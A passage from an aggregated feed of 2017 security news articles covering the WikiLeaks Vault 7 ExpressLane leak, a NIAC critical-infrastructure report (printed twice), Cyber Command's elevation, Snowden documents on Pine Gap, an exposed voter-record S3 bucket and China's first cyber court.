The documents show that ExpressLane is installed on the targeted system by an OTS officer claiming to perform an upgrade to the biometric system from a USB drive. ExpressLane displays a bogus update screen for a period of time specified by the agent, while in the background the targeted biometric data is compressed, encrypted and copied to the officer’s USB drive.

The files copied to the USB drive are later extracted at headquarters using a different utility called ExitRamp.

Another feature of ExpressLane allows the agency to ensure that the biometric software is disabled after a specified number of days unless action is taken. When the tool is installed, a kill date, which specifies when the biometric software will stop functioning, is set (the default value is 6 months in the future). If an agent does not return with the ExpressLane USB drive within that period, the license for the biometric software expires. Whenever ExpressLane is run on the targeted system, the kill date is extended.

This helps the CIA ensure that the collected biometric data ends up in its possession, and provides a way for the agency to disable the biometric software if access is no longer granted.

The documents leaked by WikiLeaks are dated 2009 and the instructions they contain are mainly for Windows XP. It’s unclear if the tool continues to be used and what improvements have been made to it if it’s still maintained.

According to WikiLeaks, the core components of the biometric system are made by Cross Match, a Florida-based company that provides biometric software to law enforcement and intelligence agencies. The company made headlines in 2011 when reports claimed that one of its field devices had been used to identify al-Qaeda leader Osama bin Laden.

WikiLeaks has published documents describing several tools allegedly developed by the CIA, including for hacking OS X systems (Imperial), intercepting SMS messages on Android devices (HighRise), redirecting traffic on Linux systems (OutlawCountry), stealing SSH credentials (BothanSpy), spreading malware on an organization’s network (Pandemic), locating people via their device’s Wi-Fi (Elsa), hacking routers and access points (Cherry Blossom), and accessing air-gapped networks (Brutal Kangaroo).


Report Suggests 'Fleeting Window' to Prevent Major Cyber Attack on Critical Infrastructure

25.8.2017 securityweek BigBrothers
The National Infrastructure Advisory Council (NIAC) published a draft report this week titled Securing Cyber Assets: Addressing Urgent Cyber Threats to Critical Infrastructure (PDF). The report warns there is a narrow and fleeting window to prepare for and prevent "a 9/11-level cyber-attack" against the U.S. critical infrastructure.

The purpose of NIAC is to advise the President on the cybersecurity of critical services, such as banking, finance, energy and transportation. The Council was created in 2001 by President Bush's executive order 13231, and its functioning was extended until September 2017 by Obama's 2015 executive order 13708. It can comprise up to 30 members chosen by the President.

The new report makes 11 recommendations to improve the security of the critical infrastructure. Overall, it presents a damning indictment on U.S. readiness. "We believe the U.S. government and private sector collectively have the tremendous cyber capabilities and resources needed to defend critical private systems from aggressive cyber-attacks -- provided they are properly organized, harnessed, and focused. Today, we're falling short."

There is an intriguing back-drop to this report -- on the day before its publication, seven of the existing 27 members resigned. Resignations among President Trump's advisors are common, with causes ranging from the political (such as Tesla's Elon Musk and Disney's Robert Iger resigning from Trump's business panel over the withdrawal from the Paris climate accord), and 'cultural' (such as those who left the Manufacturing Jobs Initiative and the Strategic and Policy Forum over the President's Charlottesville comments).

In their NIAC resignation letter (seen by Roll Call), the Paris accord and Charlottesville were again mentioned, together with the President's 'attacks' on CEOs who do resign from his advisory panels. However, the letter also noted the President's "insufficient attention to the growing threats to the cybersecurity of the critical systems upon which all Americans depend..." It is not clear whether and to what extent -- if any -- these resignations relate to the President and NIAC.

That said, the NIAC report has been received by the industry with little enthusiasm and much reservation. For example, Patrick Coyle (owner and author of Chemical Facility Security News) questions the validity of the 9/11 reference. He simply does not believe that the main threat is "the grand cyber-attack; the infamous cyber pearl harbor." A grand attack, he told SecurityWeek, will require a grand response; "a kinetic response that few would be willing to risk."

Coyle believes that the more likely threat "would be a number of smaller attacks that weakened the economy and reduced the will of the American people to resist. Such attacks would be much less likely to garner a kinetic response, so the risk to the attacker would be much less."

Sqrrl director Matt Zanderigo, calls it a "good report with solid, actionable recommendations;" but adds that many of the recommendations are not new. "This is less an issue of strategy and more about execution," he told SecurityWeek. "It is good to see that the final recommendation is focused on tracking activity and performance against these recommendations, as I think that will be key and should be done as transparently and publicly as possible."

But there remains a potentially fatal flaw: NIAC's recommendations are all voluntary, albeit with incentives. "The problem with voluntary measures and incentives for critical infrastructure owners," he said, "is that the national consequences of a cyber attack on certain key pieces of critical infrastructure far outweigh the local impacts for that owner/operator. This mismatch between local risk and national risk for cyber-attacks on critical infrastructure is the type of market inefficiency that is typically best filled by regulation."

The lack of innovative ideas also concerns Chris Roberts, chief security architect at Acalvio. "Frankly, eleven key recommendations are about five too many," he said. "Let's face it, we've all been screaming about critical infrastructure for years, keeping the message very simple -- and this 45-page report comes out, says the same thing and then, heaven forbid, puts the remit for action into the governments hands."

He has more specific concerns. Recommendation #3 states, "Identify best-in-class SCANNING TOOLS AND ASSESSMENT PRACTICES, and work with owners and operators of the most critical networks to scan and sanitize their systems on a voluntary basis;" and then calls for action from the National Security Council, the Department of Homeland Security, and Congress.

Roberts' opinion is scathing. "Seriously, we are going to let Congress work out what scanning tools we should use? What idiot came up with that one?"

Perhaps the biggest disappointment is over critical infrastructure threat intelligence sharing. Recommendation #2 calls for a private-sector-led pilot "to test public-private and company-to-company information sharing of cyber threats at network speed." This would be augmented by Recommendation #7: "Establish clear protocols to RAPIDLY DECLASSIFY CYBER THREAT INFORMATION and proactively share it with owners and operators of critical infrastructure."

In short, private industry needs to share threat information among itself better than it does, while government needs to share its intelligence with private industry. On company-to-company sharing, Roberts comments, "Oh good, another feed for people to ignore, to not pay attention to, or too little information too late for anyone to be able to do anything with."

Nor does he believe that government sharing will come to much. "Telling the DOE, DHS, ODNI and SICC to work with separating communications is going to be interesting especially as most of them, honestly, can't communicate effectively today."

Jason Kent, CTO at AsTech, believes these two recommendations should be treated as one. It's not going to be easy. "When something about an adversary or attacker is learned, that becomes a carefully guarded secret." Government agencies do not like sharing their secrets, while individual companies often dare not because of the complexity of existing legislation.

Kent's recommendation would be to start with the government agencies since they can be more easily compelled than private industry. "Imagine if you could get all these guys to collaborate: DOE, DHA, ODNI, NSC, SICC. What is the conduit through which they should speak? We don't currently have a way for them to share threat intel. Obviously an impartial 3rd party is needed to facilitate the communication, but how do we create one with nothing like this built today?"

His solution would be a national cyber security council "that basically takes threat data from our nation's various infrastructures, combined with feeds from private organizations, that is consumed and analyzed for patterns and risks... True security," he says, "comes from the security of all, not the one. We need to change our focus from protecting one asset at a time to protecting all assets at risk.” To solve this, he proposes a new third-party organization that is trusted by both public and private organizations able to share solutions rather than just threats.

The overriding problem with the NIAC report is the perception that it repeats known problems and proposes new studies without offering realistic solutions. In summary, a common feeling within the industry is that the NIAC report is too complicated, says little that is new, and provides voluntary recommendations that will likely be ignored for the same good business reasons that are already being ignored.


Report Suggests 'Fleeting Window' to Prevent Major Cyber Attack on Critical Infrastructure

24.8.2017 securityweek  BigBrothers
The National Infrastructure Advisory Council (NIAC) published a draft report this week titled Securing Cyber Assets: Addressing Urgent Cyber Threats to Critical Infrastructure (PDF). The report warns there is a narrow and fleeting window to prepare for and prevent "a 9/11-level cyber-attack" against the U.S. critical infrastructure.

The purpose of NIAC is to advise the President on the cybersecurity of critical services, such as banking, finance, energy and transportation. The Council was created in 2001 by President Bush's executive order 13231, and its functioning was extended until September 2017 by Obama's 2015 executive order 13708. It can comprise up to 30 members chosen by the President.

The new report makes 11 recommendations to improve the security of the critical infrastructure. Overall, it presents a damning indictment on U.S. readiness. "We believe the U.S. government and private sector collectively have the tremendous cyber capabilities and resources needed to defend critical private systems from aggressive cyber-attacks -- provided they are properly organized, harnessed, and focused. Today, we're falling short."

There is an intriguing back-drop to this report -- on the day before its publication, seven of the existing 27 members resigned. Resignations among President Trump's advisors are common, with causes ranging from the political (such as Tesla's Elon Musk and Disney's Robert Iger resigning from Trump's business panel over the withdrawal from the Paris climate accord), and 'cultural' (such as those who left the Manufacturing Jobs Initiative and the Strategic and Policy Forum over the President's Charlottesville comments).

In their NIAC resignation letter (seen by Roll Call), the Paris accord and Charlottesville were again mentioned, together with the President's 'attacks' on CEOs who do resign from his advisory panels. However, the letter also noted the President's "insufficient attention to the growing threats to the cybersecurity of the critical systems upon which all Americans depend..." It is not clear whether and to what extent -- if any -- these resignations relate to the President and NIAC.

That said, the NIAC report has been received by the industry with little enthusiasm and much reservation. For example, Patrick Coyle (owner and author of Chemical Facility Security News) questions the validity of the 9/11 reference. He simply does not believe that the main threat is "the grand cyber-attack; the infamous cyber pearl harbor." A grand attack, he told SecurityWeek, will require a grand response; "a kinetic response that few would be willing to risk."

Coyle believes that the more likely threat "would be a number of smaller attacks that weakened the economy and reduced the will of the American people to resist. Such attacks would be much less likely to garner a kinetic response, so the risk to the attacker would be much less."

Sqrrl director Matt Zanderigo, calls it a "good report with solid, actionable recommendations;" but adds that many of the recommendations are not new. "This is less an issue of strategy and more about execution," he told SecurityWeek. "It is good to see that the final recommendation is focused on tracking activity and performance against these recommendations, as I think that will be key and should be done as transparently and publicly as possible."

But there remains a potentially fatal flaw: NIAC's recommendations are all voluntary, albeit with incentives. "The problem with voluntary measures and incentives for critical infrastructure owners," he said, "is that the national consequences of a cyber attack on certain key pieces of critical infrastructure far outweigh the local impacts for that owner/operator. This mismatch between local risk and national risk for cyber-attacks on critical infrastructure is the type of market inefficiency that is typically best filled by regulation."

The lack of innovative ideas also concerns Chris Roberts, chief security architect at Acalvio. "Frankly, eleven key recommendations are about five too many," he said. "Let's face it, we've all been screaming about critical infrastructure for years, keeping the message very simple -- and this 45-page report comes out, says the same thing and then, heaven forbid, puts the remit for action into the governments hands."

He has more specific concerns. Recommendation #3 states, "Identify best-in-class SCANNING TOOLS AND ASSESSMENT PRACTICES, and work with owners and operators of the most critical networks to scan and sanitize their systems on a voluntary basis;" and then calls for action from the National Security Council, the Department of Homeland Security, and Congress.

Roberts' opinion is scathing. "Seriously, we are going to let Congress work out what scanning tools we should use? What idiot came up with that one?"

Perhaps the biggest disappointment is over critical infrastructure threat intelligence sharing. Recommendation #2 calls for a private-sector-led pilot "to test public-private and company-to-company information sharing of cyber threats at network speed." This would be augmented by Recommendation #7: "Establish clear protocols to RAPIDLY DECLASSIFY CYBER THREAT INFORMATION and proactively share it with owners and operators of critical infrastructure."

In short, private industry needs to share threat information among itself better than it does, while government needs to share its intelligence with private industry. On company-to-company sharing, Roberts comments, "Oh good, another feed for people to ignore, to not pay attention to, or too little information too late for anyone to be able to do anything with."

Nor does he believe that government sharing will come to much. "Telling the DOE, DHS, ODNI and SICC to work with separating communications is going to be interesting especially as most of them, honestly, can't communicate effectively today."

Jason Kent, CTO at AsTech, believes these two recommendations should be treated as one. It's not going to be easy. "When something about an adversary or attacker is learned, that becomes a carefully guarded secret." Government agencies do not like sharing their secrets, while individual companies often dare not because of the complexity of existing legislation.

Kent's recommendation would be to start with the government agencies since they can be more easily compelled than private industry. "Imagine if you could get all these guys to collaborate: DOE, DHA, ODNI, NSC, SICC. What is the conduit through which they should speak? We don't currently have a way for them to share threat intel. Obviously an impartial 3rd party is needed to facilitate the communication, but how do we create one with nothing like this built today?"

His solution would be a national cyber security council "that basically takes threat data from our nation's various infrastructures, combined with feeds from private organizations, that is consumed and analyzed for patterns and risks... True security," he says, "comes from the security of all, not the one. We need to change our focus from protecting one asset at a time to protecting all assets at risk.” To solve this, he proposes a new third-party organization that is trusted by both public and private organizations able to share solutions rather than just threats.

The overriding problem with the NIAC report is the perception that it repeats known problems and proposes new studies without offering realistic solutions. In summary, a common feeling within the industry is that the NIAC report is too complicated, says little that is new, and provides voluntary recommendations that will likely be ignored for the same good business reasons that are already being ignored.


WikiLeaks: CIA Secretly Collected Data From Liaison Services

24.8.2017 securityweek  BigBrothers
WikiLeaks has published another round of Vault 7 documents, this time describing a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to secretly collect biometric data from the agency’s liaison services.

The leaked documents, marked as “secret,” appear to reveal that the CIA’s Office of Technical Services (OTS) and Identity Intelligence Center (I2C), both part of the agency’s Directorate of Science and Technology, have provided liaison services with a system that collects biometric information.

According to WikiLeaks, these liaison services include other U.S. government agencies, such as the National Security Agency (NSA), the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI).

In order to ensure that liaison services share the collected biometric data, the CIA has developed a tool called ExpressLane, which secretly copies the data collected by the biometric software and disables this software if continued access is not provided to the agency.

The documents show that ExpressLane is installed on the targeted system by an OTS officer claiming to perform an upgrade to the biometric system from a USB drive. ExpressLane displays a bogus update screen for a period of time specified by the agent, while in the background the targeted biometric data is compressed, encrypted and copied to the officer’s USB drive.

The files copied to the USB drive are later extracted at headquarters using a different utility called ExitRamp.

Another feature of ExpressLane allows the agency to ensure that the biometric software is disabled after a specified number of days unless action is taken. When the tool is installed, a kill date, which specifies when the biometric software will stop functioning, is set (the default value is 6 months in the future). If an agent does not return with the ExpressLane USB drive within that period, the license for the biometric software expires. Whenever ExpressLane is run on the targeted system, the kill date is extended.

This helps the CIA ensure that the collected biometric data ends up in its possession, and provides a way for the agency to disable the biometric software if access is no longer granted.

The documents leaked by WikiLeaks are dated 2009 and the instructions they contain are mainly for Windows XP. It’s unclear if the tool continues to be used and what improvements have been made to it if it’s still maintained.

According to WikiLeaks, the core components of the biometric system are made by Cross Match, a Florida-based company that provides biometric software to law enforcement and intelligence agencies. The company made headlines in 2011 when reports claimed that one of its field devices had been used to identify al-Qaeda leader Osama bin Laden.

WikiLeaks has published documents describing several tools allegedly developed by the CIA, including for hacking OS X systems (Imperial), intercepting SMS messages on Android devices (HighRise), redirecting traffic on Linux systems (OutlawCountry), stealing SSH credentials (BothanSpy), spreading malware on an organization’s network (Pandemic), locating people via their device’s Wi-Fi (Elsa), hacking routers and access points (Cherry Blossom), and accessing air-gapped networks (Brutal Kangaroo).


Here's How CIA Spies On Its Intelligence Liaison Partners Around the World
24.8.2017 thehackernews BigBrothers

WikiLeaks has just published another Vault 7 leak, revealing how the CIA spies on their intelligence partners around the world, including FBI, DHS and the NSA, to covertly collect data from their systems.
The CIA offers a biometric collection system—with predefined hardware, operating system, and software—to its intelligence liaison partners around the world that helps them voluntary share collected biometric data on their systems with each other.
But since no agency share all of its collected biometric data with others, the Office of Technical Services (OTS) within CIA developed a tool to secretly exfiltrate data collections from their systems.
Dubbed ExpressLane, the newly revealed CIA project details about the spying software that the CIA agents manually installs as part of a routine upgrade to the Biometric system.
The leaked CIA documents reveal that the OTS officers, who maintain biometric collection systems installed at liaison services, visit their premises and secretly install ExpressLane Trojan while displaying an "upgrade Installation screen with a progress bar that appears to be upgrading the biometric software."
"It will overtly appear to be just another part of this system. It’s called: MOBSLangSvc.exe and is stored in \Windows\System32," leaked CIA documents read.
"Covertly it will collect the data files of interest from the liaison system and store them encrypted in the covert partition on a specially watermarked thumb drive when it is inserted into the system."
ExpressLane includes two components:
Create Partition — This utility allows agents to create a covert partition on the target system where the collected information (in compressed and encrypted form) will be stored.

Exit Ramp — This utility lets the agents steal the collected data stored in the hidden partition using a thumb drive when they revisit.

The latest version ExpressLane 3.1.1 by default removes itself after six months of the installation in an attempt to erase its footprints, though the OTA officers can change this date.
The biometric software system that CIA offers is based on a product from Cross Match, a US company specialized in biometric software for law enforcement and the intelligence community, which was also used to "identify Osama bin Laden during the assassination operation in Pakistan."
Previous Vault 7 CIA Leaks
Last week, WikiLeaks published another CIA project, dubbed CouchPotato, which revealed the CIA's ability to spy on video streams remotely in real-time.
Since March, WikiLeaks has published 21 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
Dumbo — A CIA project that disclosed the CIA's ability to hijack and manipulate webcams and microphones to corrupt or delete recordings.
Imperial — A CIA project that revealed details of at least 3 CIA-developed hacking tools and implants designed to target computers running Apple Mac OSX and different flavours of Linux OS.
UCL/Raytheon — An alleged CIA contractor, who analysed in-the-wild malware and hacking tools and submitted at least five reports to the spying agency for help it developed its malware.
Highrise — An alleged CIA project that allows the spying agency to stealthy collect and forward stolen information from compromised phones to its server via SMS messages.
BothanSpy and Gyrfalcon — Two alleged CIA implants that allowed the US agency to intercept and exfiltrate SSH credentials from target Windows and Linux computers.
OutlawCountry – An alleged CIA project that let the agency hack and remotely spy on computers running Linux OS.
ELSA – Alleged CIA malware that tracks the location of targeted laptops and PCs running the Microsoft Windows operating system.
Brutal Kangaroo – A Microsoft Windows tool suite used by the agents to target closed networks or air-gap PCs within an organisation or enterprise without requiring any direct access.
Cherry Blossom – A CIA framework employed by its agents to monitor the Internet activity of the target systems by exploiting bugs in Wi-Fi devices.
Pandemic – A CIA project that let the spying agency turn Windows file servers into covert attack machines that can silently infect other systems of interest inside the same network.
Athena – A spyware framework that the US secretive agency uses to take full control of the infected Windows machines remotely and works against every version of Windows operating system–from Windows XP to Windows 10.
AfterMidnight and Assassin – Two alleged CIA malware frameworks for the Windows platform that's designed to monitor and report back actions on the infected remote host system and execute malicious actions.
Archimedes – Man-in-the-middle attack tool allegedly developed by the US agency to target systems inside a Local Area Network (LAN).
Scribbles – Software allegedly designed to embed 'web beacons' into confidential documents, allowing the agents to track insiders and whistleblowers.
Grasshopper – A framework that let the spying agency easily create its custom malware for breaking into Microsoft Windows and bypassing antiviruses.
Marble – Source code of a secret anti-forensic tool used by the US agency to hide the actual source of its malicious payload.
Dark Matter – Hacking exploits the US spying agency designed and used to target iPhones and Macs.
Weeping Angel – A spying tool used by the CIA agents to infiltrate smart TV's and transform them into covert microphones.
Year Zero – CIA hacking exploits for popular hardware and software.


The Role of America's New Unified Cyber Warfare Command

23.8.2017 securityweek BigBrothers
U.S. President Donald Trump on Aug. 18 announced the elevation of the U.S. Cyber Command (USCYBERCOM/CyberCom) to a Unified Combatant Command. This brings American offensive and defensive cyber operations out of the implicit overview of the NSA and puts it on an equal footing -- with major implications for the U.S. national cyber security posture.

A Unified Command is a structure that acknowledges an inter-relationship with another authority -- in this case, primarily the U.S. National Security Agency (NSA). However, Trump's statement adds, "The Secretary of Defense is examining the possibility of separating United States Cyber Command from the National Security Agency." For the time being at least, both the NSA and Cyber Command will continue under the same leadership, currently Admiral Michael Rogers.

Rogers has always been against a separation. The United States Cyber Command was formed in 2009, sharing the resources, headquarters and commander with the NSA. It achieved operational capability in late 2010. The idea was that military hackers could learn from the NSA's hackers. However, as indications of international cyber war have increased, the organizations' objectives have diverged: the NSA's fundamental purpose is to collect intelligence, while USCYBERCOM's role is to achieve military objectives. Rogers fears that such military objectives, undertaken independently, could interfere with the process of intelligence gathering.

Trump, however, clearly feels that the time is ripe. "The elevation of United States Cyber Command demonstrates our increased resolve against cyberspace threats and will help reassure our allies and partners and deter our adversaries," he said. "Through United States Cyber Command, we will tackle our cyberspace challenges in coordination with like-minded allies and partners as we strive to respond rapidly to evolving cyberspace security threats and opportunities globally."

SecurityWeek spoke to a number of the cybersecurity firms that defend against the aggressive cyber-attacks from both criminals and nation states, to get their take on this development.

The overriding view is that this is a good step.

"First," says Nathaniel Gleicher, head of cybersecurity strategy at Illumio and a former director for cybersecurity policy at The White House, "it is a recognition that cyber threats are more significant and serious than ever -- responding to them requires coordinated decision-making across all branches of the military, and elevating USCYBERCOM creates a place for that to happen."

Second, he added, "It recognizes that CyberCom's capabilities have matured over the last eight years. The responsibilities of a unified combatant command are much more significant than those of a sub-unified command -- and the consequences of mistakes are greater. Elevating CyberCom is a signal that DoD thinks it's ready for the challenge."

Ely Kahn, co-founder of Sqrrl and another former director of cybersecurity at The White House, sees it as a way of mitigating natural tensions between USCYBERCOM and the NSA. "A military commander may want to disrupt communications of an enemy leading up to or during an operation," he explains. "This could lead to an intelligence professional losing a key source of information. By putting USCYBERCOM on equal footing as the NSA in terms of being a direct report to the SECDEF, it gives more balance to these opposing objectives when a debate arises."

Elevating Cyber Command to a Unified Combatant Command will inevitably give it greater freedom of action while also attracting more skilled operatives. "I expect that we will see large increases to budget and staffing now, with a focus on recruiting the kind of top-level talent that the government has had some difficulty in acquiring previously," suggests Nathan Wenzler, chief security strategist at AsTech. "But given the more autonomous nature of how U.S. Cyber Command will be able to operate, and to present itself as a more prestigious opportunity to serve one's country, I believe it will have a much better chance to recruit that critical talent than other agencies have done up until this point."

Chris Roberts, chief security architect at Acalvio, believes it is an important step in U.S. cyber operations. "Cyber Command arguably enables all of the other combatant commands that are in place," he explains. "There's a number of them that obviously cover all other aspects, so it seems 'right' to elevate cyber to its own UCC that can have influence/management and control over cyber operations as well as manpower, cybersecurity and IT and operational tech infrastructure requirements."

One consistent view is that it is a good and necessary process -- and if anything, none too soon. "Since North Korea attacked Sony in 2014, the United States has been plagued by constant, sophisticated cyber-attacks that have threatened our critical infrastructure, undermined our democracy, stolen from our banks and businesses, compromised the identities of our citizens and have locked out information away behind malicious encrypted code," says Eric O'Neill, currently national security strategist with Carbon Black -- but once an investigative specialist for the National Security Division of the FBI.

"For some time now I have preached that there are no hackers, there are only spies. The majority of successful breaches are driven by foreign cyber intelligence units -- cyber spies from other nations -- that use traditional espionage tactics in a digital environment to disable, steal, destroy and disrupt information. The United States has fallen far behind the curve in addressing the external cyber threat. I applaud the initiative in elevating the US Cyber Command."

Paul Kurtz, co-founder and CEO of TruSTAR Technology and a former White House National Security Council staff member takes a similar view. "This decision affirms cyberspace as a new war domain," he told SecurityWeek. "The timing is ripe to form this command given the growing severity of cyber-attacks. Adversaries have shown they are ready to use cyber weapons to handicap military readiness and response or to disrupt or destroy critical infrastructure in the U.S. This decision also signals our intent to continue developing cyber weapons, and our adversaries will take note. The government's current ability to defend critical infrastructure is inherently limited and the private sector will need to step up sooner rather than later to exchange information about attacks underway to better defend ourselves."

However, the elevation of Cyber Command is only considered a first step -- the complete separation from the NSA with its own commander is considered an important next step.

"Cyber Command is responsible for coordinating and leading military network defense. Placing this effort in spy agencies like the CIA and NSA is no longer effective," says O'Neill. "Indeed, how can we trust the NSA and CIA to defend us in the cyber war we are fighting when the agencies cannot defend their own attack tools? The breaches by the Shadow Brokers and the Vault-7 release to Wikileaks demonstrate that the US requires a better coordinated effort to defend against cyber-attacks."

Gleicher adds, "As important as this decision is, I am watching for another change to CyberCom that has also long been in the works but was delayed last week. CyberCom is led by Admiral Rogers, the same official who also heads the National Security Agency. The other big change that is discussed alongside elevating USCYBERCOM is separating out these two commands -- giving CyberCom its own leader. This is an important step," he believes, "because the mission of the NSA is different from the mission of the military, and lumping them together under the same leader means that when those two missions conflict, one set of priorities has to win out over the other. As serious as the cyber threat is today, it's past time that we had an independent voice inside the DoD advocating for cyber defense. CyberCom could be that voice, and I'm hopeful that last week's announcement is only the first step, and command separation will follow."

The last word comes from O'Neill. "Many Americans have forgotten the Cold War, fought with the Soviet Union over nuclear ambitions and military force projection across the globe. The truth is that the Cold War did not end with the fall of the USSR. Instead, the war multiplied to a strategic and tactical war in cyberspace. Russia, China, North Korea, Iran and other nation states have attacked the United states effortlessly and remorselessly over the last decade. Cyber-attacks are the perfect warfare. They hide behind a manufactured cloak of anonymity, deal in secrecy and disruption, and effortlessly steal information that improves the economics and policies of rival nations. The United States has long required a new approach to addressing the external cyber threat from military and spy agencies. Our civilian agencies could not carry the burden. I hope that the new Unified Cyber Command can take up the charge."


New Snowden Doc Exposes How NSA's Facility in Australia Aids Drone Strikes
21.8.2017 thehackernews BigBrothers

The new documents leaked by former NSA contractor Edward Snowden has exposed a United States secretive facility located near a remote town in Australia's Northern Territory for covertly monitoring wireless communications and aiding US military missions.
The leaked documents have come from the massive trove of classified material stolen by Snowden from the US National Security Agency (NSA) in 2013 that exposed the extent of the US government's global surveillance programs.
The newly released classified documents, obtained by The Intercept, contained references to a secretive facility, which was codenamed "Rainfall," but is officially known as the Joint Defence Facility Pine Gap.
The documents reveal that the Joint Defence Facility Pine Gap, located outside Alice Springs, deployed cutting-edge satellite technology for detailed geolocation intelligence that helps the US military locate targets for special forces and drone strikes.
The use of unmanned air vehicles, generally known as drones, by the U.S. military has previously been blamed for hundreds of civilian deaths in countries like Pakistan, Afghanistan, Yemen, Syria, and Somalia.
As outlined in a secret intelligence document, Pine Gap's aim is to "support the national security of both the U.S. and Australia. The [facility] contributes to verifying arms control and disarmament agreements and monitoring military developments."
However, in reality, Pine Gap has a far broader mission with powerful capabilities than the Australian or U.S. government has ever publicly acknowledged.
Pine Gap finds Targets for U.S. Drone Strikes
The satellites used by the Pine Gap are described as being "geosynchronous"—likely positioned high in orbit at over 20,000 miles above the earth's surface—which are equipped with powerful surveillance technology to monitor wireless communications on the ground, like those sent and received by mobile phones, radios, and satellite uplinks.
According to the leaked documents, these satellites collect "strategic and tactical military, scientific, political, and economic communications signals," and also keep eyes on any missile or weapon tests in targeted countries, steal intel from foreign military data systems, and provide surveillance support to United States forces.
One of the secret NSA documents analysed by the Australian Broadcasting Corporation (ABC) suggests that the facility's role is not only to collect signals, but also to analyse them, as it "detects, collects, records, processes, analyses and reports" on almost everything—from surface-to-air missiles to anti-aircraft artillery and fighter aircraft.
One mission even pilfered communications from the former Soviet Union, China, East Asia, South Asia, the Middle East, Eastern Europe, and territories in the Atlantic Ocean.
In 2013, the Sydney Morning Herald reported that Pine Gap played a major role in controversial U.S. drone strikes, which had also resulted in the deaths of hundreds of innocent civilians.
Trump Administration Doubled the Drone Strikes
Richard Tanter, the University of Melbourne’s professor who has previously studied Pine Gap, told the publication that "Pine Gap will be contributing hugely in real-time to those operations, as well as in preparation for them."
"So whether or not the Australian government thinks that an attack on North Korea is either justified or a wise and sensible move, we will be part of that. We'll be culpable in terms of the consequences," Tanter asserted.
Under Trump administration, drone strikes and special operations raids have doubled, while simultaneously loosening battlefield rules to prevent civilian deaths in such air attacks.
However, David Rosenberg, who worked inside Pine Gap as a team leader of weapon signals analysis for at least 18 years until 2008, confirms the facility's geolocation capability, claiming that preventing civilian casualties is a high priority.
"One thing I can certainly tell you the governments of Australia, and the United States would, of course, want to minimise all civilian casualties," Rosenberg says. "Pine Gap does help to provide limitation of civilian casualties by providing accurate intelligence."
It is not at all surprising to see Australia working closely with its U.S. counterparts to help conduct global surveillance since it is a key member of the "Five Eyes" alliance—alongside the US, UK, New Zealand and Canada—all openly shares secret intelligence reports.


Misconfigured AWS S3 exposed 1.8 million US voter records
19.8.2017 securityaffairs BigBrothers

More than 1.8 million voter records belonging to Americans have been accidentally leaked online by a US voting machine supplier for dozens of US states.
It has happened again, more than 1.8 million voter records belonging to Americans have been accidentally leaked online by a US voting machine supplier for dozens of US states.

The voter records were left openly accessible online due to a misconfiguration in AWS-hosted storage.
Once again, the huge trove of records was spotted by the popular UpGuard researcher Chris Vickery. The archive contained records the ES&S collected from recent elections in Chicago, Illinois.

“As part of an effort to find unsecured files on Amazon Web Services (AWS) server platforms, a private researcher completed a download of the Election Systems & Software (ES&S) backup files of voter data that were prepared for Chicago’s electronic pollbooks and stored on the AWS platform.” reads the statement issued by ES&S. “The voter data in the backup files included about 1.8 million names, addresses, dates of birth, partial Social Security numbers, and in some cases, driver’s license and state ID numbers.”

The records included voters’ names, addresses, dates of birth, and partial social security numbers. In some cases, the records also included drivers’ licenses and state ID numbers.

“The backup files on the AWS server did not include any ballot information or vote totals and were not in any way connected to Chicago’s voting or tabulation systems,” reads the statement issued by the ES&S.

“These back-up files had no impact on any voters’ registration records and had no impact on the results of any election.”

voter records
Vickery alerted ES&S on August 12, he discovered the data while investigating sensitive data insecurely hosted on AWS.

The cloud system was taken down four hours after the expert notified it to the company which supplies voting machines and backend services to more than 40 US states.

Açcording to UpGuard, the vulnerable service was an AWS S3 instance accidentally set up to be open to the public. At the time I was writing we have news of the leakage only of Chicago’s voters’ data was exposed.

Chicago’s election board, meanwhile, was concerned by the discovery but appreciated the efforts of ES&S in promptly respond the incident.

“We have been in steady contact with ES&S to order and review the steps that must be taken, including the investigation of ES&S’s AWS server,” reads a statement issued by the Chicago Election Board chairwoman Marisel Hernandez.

“We will continue reviewing our contract, policies and practices with ES&S. We are taking steps to make certain this can never happen again.”

Chris Vickery discovered many other clamorous cases of open database exposed on the Internet. In July he discovered data belonging to 14 million U.S.-based Verizon customers that have been exposed on an unprotected AWS Server by a partner of the telecommunications company. In December 2015 the security expert discovered 191 million records belonging to US voters online, on April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a 1.37 billion records data leak, in June 2017 Vickery revealed the DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.


China Opens its First 'Cyber Court'

18.8.2017 securityweek BigBrothers
China's first "cyber court" was launched on Friday to settle online disputes, as the legal system attempts to keep up with the explosion of mobile payment and e-commerce.

Residents of the eastern city of Hangzhou -- home to e-commerce giant Alibaba -- can now register their internet-related civil complaints online and wait to log onto to their trial via videochat.

The cyber court will "offer regular people an efficient, low-cost solution to these new kinds of disputes that take place on the internet," Du Qian, the cyber-court chief justice, told the official Supreme People's Court news agency.

"Not only will this make lawsuits as convenient as online shopping, but it will also give online shopping the same degree of judicial protection as consumption at brick-and-mortar stores."

The court will handle cases such as online trade disputes, copyright lawsuits and product liability claims for online purchases.

China is home to the world's largest number of internet users -- 731 million at the end of last year -- and e-commerce is a vital part of the government's efforts to turn China into a consumer demand-driven economy.

Consumers spent $17.8 billion during Alibaba's biggest online shopping promotion on November 11 last year, more than twice the five-day desktop sales from Thanksgiving through Cyber Monday in the US last year.


U.S. Military to Create Separate Unified Cyber Warfare Command

18.8.2017 securityweek BigBrothers
President Donald Trump ordered the US military on Friday to elevate its cyber warfare operations to a separate command, signaling a new strategic emphasis on electronic and online offensive and defensive operations.

"This new Unified Combatant Command will strengthen our cyberspace operations and create more opportunities to improve our nation's defense," Trump said in a statement.

"The elevation of United States Cyber Command demonstrates our increased resolve against cyberspace threats and will help reassure our allies and partners and deter our adversaries."

The move would expand the number of the Defense Department's unified combatant commands to 10, putting cyber warfare on an equal footing with the Strategic Command, the Special Operations Command, and regional commands.

Until now cyber warfare operations have been run under the umbrella of the National Security Agency, the country's main electronic spying agency, with Admiral Michael Rogers heading both.

Discussions on whether to hive it off and place it directly under Pentagon direction have gone on for several years. Rogers has said several times over the past year that they needed to recruit hundreds more skilled cyber operators before the separation could take place.
